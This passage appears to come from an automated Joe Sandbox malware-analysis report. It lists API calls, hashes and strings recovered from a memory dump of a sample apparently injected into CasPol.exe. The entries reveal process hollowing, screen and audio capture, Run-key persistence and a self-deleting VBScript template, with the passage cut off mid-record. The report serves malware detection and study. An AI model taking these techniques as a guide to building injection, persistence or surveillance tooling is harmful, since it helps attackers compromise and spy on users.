                                                                                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                            • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                            • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                            • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                            • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                            • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: HeapProcess
                                                                                            • String ID:
                                                                                            • API String ID: 54951025-0
                                                                                            • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                            • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                            • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                            • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                            APIs
                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                              • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                            • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                            • DeleteDC.GDI32(?), ref: 0041805D
                                                                                            • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                            • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                            • DeleteObject.GDI32(?), ref: 004180FA
                                                                                            • DeleteObject.GDI32(?), ref: 00418107
                                                                                            • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                            • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                            • DeleteDC.GDI32(?), ref: 0041827F
                                                                                            • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                            • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                            • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                            • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                            • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                            • DeleteDC.GDI32(?), ref: 0041835B
                                                                                            • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                            • DeleteDC.GDI32(?), ref: 00418398
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                            • DeleteObject.GDI32(?), ref: 004183A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                            • String ID: DISPLAY
                                                                                            • API String ID: 1765752176-865373369
                                                                                            • Opcode ID: 54e54478d3a93c6a48e505b633be5783707cf85144324253bebfee7b4c7dea2f
                                                                                            • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                            • Opcode Fuzzy Hash: 54e54478d3a93c6a48e505b633be5783707cf85144324253bebfee7b4c7dea2f
                                                                                            • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                            • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                            • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                            • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                            • GetLastError.KERNEL32 ref: 004175C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Wu$ntdll
                                                                                            • API String ID: 4188446516-529412701
                                                                                            • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                            • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                            • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                            • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                            APIs
                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                            • ExitProcess.KERNEL32 ref: 0041151D
                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                            • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                            • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                              • Part of subcall function 0041B58F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                              • Part of subcall function 0041B58F: WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                              • Part of subcall function 0041B58F: CloseHandle.KERNELBASE(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                            • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                            • API String ID: 4250697656-2665858469
                                                                                            • Opcode ID: 03a34ccbb1719861567300b1fb31a781f765c9736e7961dcb0677a4d0e3d5b11
                                                                                            • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                            • Opcode Fuzzy Hash: 03a34ccbb1719861567300b1fb31a781f765c9736e7961dcb0677a4d0e3d5b11
                                                                                            • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                            APIs
                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                            • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                            • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                            • API String ID: 1861856835-3168347843
                                                                                            • Opcode ID: 409babfc3f9b08b074d448c79d47c1e2609d1484c5e5d0d3969d76ee1aa606fb
                                                                                            • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                                                            • Opcode Fuzzy Hash: 409babfc3f9b08b074d448c79d47c1e2609d1484c5e5d0d3969d76ee1aa606fb
                                                                                            • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                                                            APIs
                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                            • ExitProcess.KERNEL32 ref: 0040C287
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                            • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                            • API String ID: 3797177996-1998216422
                                                                                            • Opcode ID: fb087b58bfc3a3b2b8260ca2d682e14f903258253ee2e6fe22ab8b926fdeca3f
                                                                                            • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                            • Opcode Fuzzy Hash: fb087b58bfc3a3b2b8260ca2d682e14f903258253ee2e6fe22ab8b926fdeca3f
                                                                                            • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                            APIs
                                                                                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                            • SetEvent.KERNEL32 ref: 0041A38A
                                                                                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                            • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                            • API String ID: 738084811-1408154895
                                                                                            • Opcode ID: 8cf0e19f8ce88e8d7cb937eb39cd8d73a713176ac88778056ef84971429f9c19
                                                                                            • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                            • Opcode Fuzzy Hash: 8cf0e19f8ce88e8d7cb937eb39cd8d73a713176ac88778056ef84971429f9c19
                                                                                            • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                            • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                            • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                            • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$Write$Create
                                                                                            • String ID: RIFF$WAVE$data$fmt
                                                                                            • API String ID: 1602526932-4212202414
                                                                                            • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                            • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                            • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                            • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                            • API String ID: 1646373207-165202446
                                                                                            • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                            • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                            • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                            • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 0040BC75
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                            • _wcslen.LIBCMT ref: 0040BD54
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                            • _wcslen.LIBCMT ref: 0040BE34
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                            • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                            • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                                            • API String ID: 1579085052-1280438975
                                                                                            • Opcode ID: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                            • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                            • Opcode Fuzzy Hash: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                            • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                            • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                            • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                            • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                            • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
